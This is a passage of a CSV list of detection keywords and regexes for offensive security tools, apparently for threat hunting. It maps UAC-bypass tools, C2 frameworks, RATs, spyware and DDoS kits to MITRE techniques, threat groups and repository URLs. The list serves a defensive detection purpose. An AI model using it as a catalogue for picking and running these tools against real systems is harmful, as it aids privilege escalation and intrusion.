tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*U2hlbGxjb2RlIFBhdGg=*",".{0,1000}U2hlbGxjb2RlIFBhdGg\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*U2VhdGJlbHQuZXhl*",".{0,1000}U2VhdGJlbHQuZXhl.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl*",".{0,1000}U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNNYW5hZ2VkCg==*",".{0,1000}U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNNYW5hZ2VkCg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*uac fodhelper *",".{0,1000}uac\sfodhelper\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*uac sdclt *",".{0,1000}uac\ssdclt\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*uac_bypass*",".{0,1000}uac_bypass.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*uac_bypass_bluetooth_win10.lua*",".{0,1000}uac_bypass_bluetooth_win10\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*uac_easinvoker.*",".{0,1000}uac_easinvoker\..{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*UACBypass -*",".{0,1000}UACBypass\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*UAC-bypass*",".{0,1000}UAC\-bypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Uacbypass.dll*",".{0,1000}Uacbypass\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*UACBypass.My*",".{0,1000}UACBypass\.My.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*uacbypass_files*",".{0,1000}uacbypass_files.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*UACBypass-BOF*",".{0,1000}UACBypass\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*UACBypassCMSTP.ps1*",".{0,1000}UACBypassCMSTP\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*UACBypassConfig.java*",".{0,1000}UACBypassConfig\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*UACBypassedService.exe*",".{0,1000}UACBypassedService\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*UACBypassTest.txt*",".{0,1000}UACBypassTest\.txt.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*uacm4gic*",".{0,1000}uacm4gic.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*UACME-master*",".{0,1000}UACME\-master.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5924","1287","2024-04-17T00:56:06Z","2015-03-28T12:04:33Z" "*uac-schtasks *",".{0,1000}uac\-schtasks\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*uac-schtasks*",".{0,1000}uac\-schtasks.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*uac-silentcleanup*",".{0,1000}uac\-silentcleanup.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*uac-token-duplication*",".{0,1000}uac\-token\-duplication.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*UACTokenManipulationManager.cs*",".{0,1000}UACTokenManipulationManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*uaf2john.*",".{0,1000}uaf2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*uberfile --lhost* --lport * --target-os * --downloader *",".{0,1000}uberfile\s\-\-lhost.{0,1000}\s\-\-lport\s.{0,1000}\s\-\-target\-os\s.{0,1000}\s\-\-downloader\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ubuntu:dnscrypt-msi*",".{0,1000}ubuntu\:dnscrypt\-msi.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*udmp-parser-main*",".{0,1000}udmp\-parser\-main.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*UDVC-Server.exe -c * -i 127.0.0.1*",".{0,1000}UDVC\-Server\.exe\s\-c\s.{0,1000}\s\-i\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","UniversalDVC","run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a DVC server. This can be seen as a form of proxy to evade detection or bypass network restrictions.","T1090","TA0005","N/A","N/A","Defense Evasion","https://github.com/earthquake/UniversalDVC","1","0","N/A","N/A","3","247","55","2020-12-07T21:02:23Z","2018-03-09T10:44:29Z" "*UFONet*",".{0,1000}UFONet.{0,1000}","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","N/A","N/A","10","2085","587","2023-10-10T15:31:41Z","2013-06-18T18:11:25Z" "*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*",".{0,1000}UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*",".{0,1000}UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*",".{0,1000}UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*uhttpsharp.*",".{0,1000}uhttpsharp\..{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*ui\sAINT.java*",".{0,1000}ui\\sAINT\.java.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*uknowsec/TailorScan*",".{0,1000}uknowsec\/TailorScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 